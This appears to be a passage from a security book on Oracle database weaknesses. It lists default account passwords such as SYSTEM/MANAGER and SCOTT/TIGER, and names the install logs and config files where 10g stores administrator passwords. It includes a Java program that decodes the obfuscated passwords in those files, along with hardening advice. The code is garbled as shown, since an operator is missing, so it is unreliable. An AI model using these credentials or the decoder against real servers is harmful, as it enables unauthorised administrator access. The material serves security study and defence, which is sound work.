Default Usernames and Passwords

No other bit of software has more well-known default usernames and passwords than Oracle. Username and password combinations are the first line of defense an attacker will try to compromise to gain authenticated access to the system. The more common ones are as follows :

SYS/CHANGE_ON_INSTALL SYSTEM/MANAGER DBSNMP/DBSNMP CTXSYS/CTXSYS MDSYS/MDSYS SCOTT/TIGER

A full list can be found in the appendix.

While it is not common to find the SYS or SYSTEM account with a default password, DBSNMP, the Intelligent Agent account, is often found to have the default password left intact. This is probably because the password needs to be changed in two places if you still want the Intelligent Agent to work. The first password change occurs in the database; the second password change needs to happen in the snmp_rw.ora file. Both CTXSYS and MDSYS, both DBAs in 9i, are often found with their default passwords left intact, too, though not as much as DBSNMP.

With the introduction of 10g, the situation improved drastically. During the install process, the installer is prompted for a password for the SYS account. This same password can then be set for the SYSTEM, DBSNMP, and SYSMAN accounts, too. All other accounts are set to EXPIRED and LOCKED. EXPIRED means the default password has expired and must be changed. However, for the default accounts and the default profile, the password can be changed to its original. People often do this so their older applications, which use hardcoded passwords, still work.

As it is still trivial to gain DBA privileges from any account that can connect to the database, every account should be protected with a strong password - and this should be enforced with a password complexity function set from the profile. Account lockout after a number of failed login attempts should also be considered for normal user accounts - care must be taken with application accounts. See the chapter on "Securing Oracle" in the Database Hacker's Handbook for more information.

Looking in Files for Passwords

Although the password situation has improved in 10g, risks remain . One such risk is that the password chosen during installation is written to certain files. For example, in 10g Release 1, the password for SYSMAN is written to the emoms.properties file in the $ORACLE_HOME/hostname_sid/sysman/config directory in clear text; 10g Release 2 uses DES to encrypt the password but the emoms file also contains the decryption key, so the password can still be retrieved: Just plug the emdRepPwd and emdRepPwdSeed properties into your nearest DES tool and out pops the clear-text password.

Another potential file where the password may be logged is post DBCreation.log . Suppose that during the install the installer chooses a hard-to-guess password with exclamation marks in it. When the passwords for the SYSMAN and DBSNMP accounts are set, the SQL script that does this executes the following:

alter user SYSMAN identified by f00bar!! account unlock alter user DBSNMP identified by f00bar!! account unlock

Due to the exclamation marks, this causes an error, which is then logged:

ERROR at line 1: ORA-00922: missing or invalid option

Because the password for the SYS and SYSTEM accounts are set in a different manner - one that doesn't cause an error - they're given the password. Thus, if someone can gain access to this file, then they might be able to discover the password for SYS and SYSTEM.

Another set of files in which passwords are logged is

$ORACLE_HOME/cfgtoollogs/cfgfw/CfmLogger_install_date.log $ORACLE_HOME/cfgtoollogs/cfgfw/oracle.assistants.server_install_date.log $ORACLE_HOME/cfgtoollogs/configToolAllCommands $ORACLE_HOME/inventory/Components21/oracle.assistants.server/10.2.0.1.0/ context.xml $ORACLE_HOME/inventory/ContentsXML/ConfigXML/oracle.assistants.server.10 _2_0_1_0.CFM.1.inst.xml $ORACLE_HOME\cfgtoollogs\oui\installActions_install_date.log (Windows only)

where install_date specifies the date and time the servers were installed. However, these passwords are obfuscated and appear as follows: 05da3f3b20f9ee5e1e992d7d35d5c0c679 , but it is a trivial matter to recover the clear-text password from this. The passwords for SYS, SYSTEM, SYSMAN, and DBSNMP can all be recovered from these files. The following Java calls the Checksum SHA function in the Checksum package. Note that the function does not perform a SHA operation. The leading 05 in the obfuscated password indicates to the code to use DES decryption. The next 16 characters form the key, and the next 16 form the password.

/* $ cp DumpPassword.java /tmp/DumpPassword.java $ cd /tmp $ /oracle/product/10.1.0/Db_1/jdk/bin/javac -classpath /tmp:/oracle/product/10.1.0/Db_1/jlib/ /tmp/DumpPassword.java $ /oracle/product/10.1.0/Db_1/jdk/bin/java -classpath /tmp:/oracle/product/10.1.0/Db_1/jlib/ DumpPassword 05da3f3b20f9ee5e1e992d7d35d5c0c679 Password is foobar */ import oracle.security.misc.Checksum; class DumpPassword { public static void main(String args[]) { byte b_in[] = HexToByteArray(args[0]); try { /* Whilst it says SHA - it's not!!! */ byte b_out[] = Checksum.SHA(b_in, null); System.out.println ("Password is "+ ByteToHex(b_out)); } catch(Exception e) { System.out.println("error"); } } public static String ByteToHex(byte a[]) { String s=""; for(int i=0; i<a.length; i++) { s+=(char)a[ i ]; } return s; } public static byte[] HexToByteArray(String str) { if(str == null) return new byte[0]; int len = str.length(); char hex[] = str.toCharArray(); byte buf[] = new byte[len / 2]; for(int pos = 0; pos < len / 2; pos++) buf[pos] = (byte)(toData(hex[2 * pos]) << 4 & 0xf0  toData(hex[2 * pos + 1]) & 0xf); return buf; } private static byte toData(char c) { if('0' <= c && c <= '9') return (byte)((byte)c - 48); if('a' <= c && c <= 'f') return (byte)(((byte)c - 97) + 10); if('A' <= c && c <= 'F') return (byte)(((byte)c - 65) + 10); else return -1; } }

Installing the 10g Application Server and grepping through the files shows that the following also have passwords obfuscated in the same manner:

$ORACLE_HOME\inventory\ContentsXML\configtools.xml $ORACLE_HOME\cfgtoollogs\configtoolsinstalldate.log $ORACLE_HOME\sysman\emd\targets.xml $ORACLE_HOME\config\ias.properties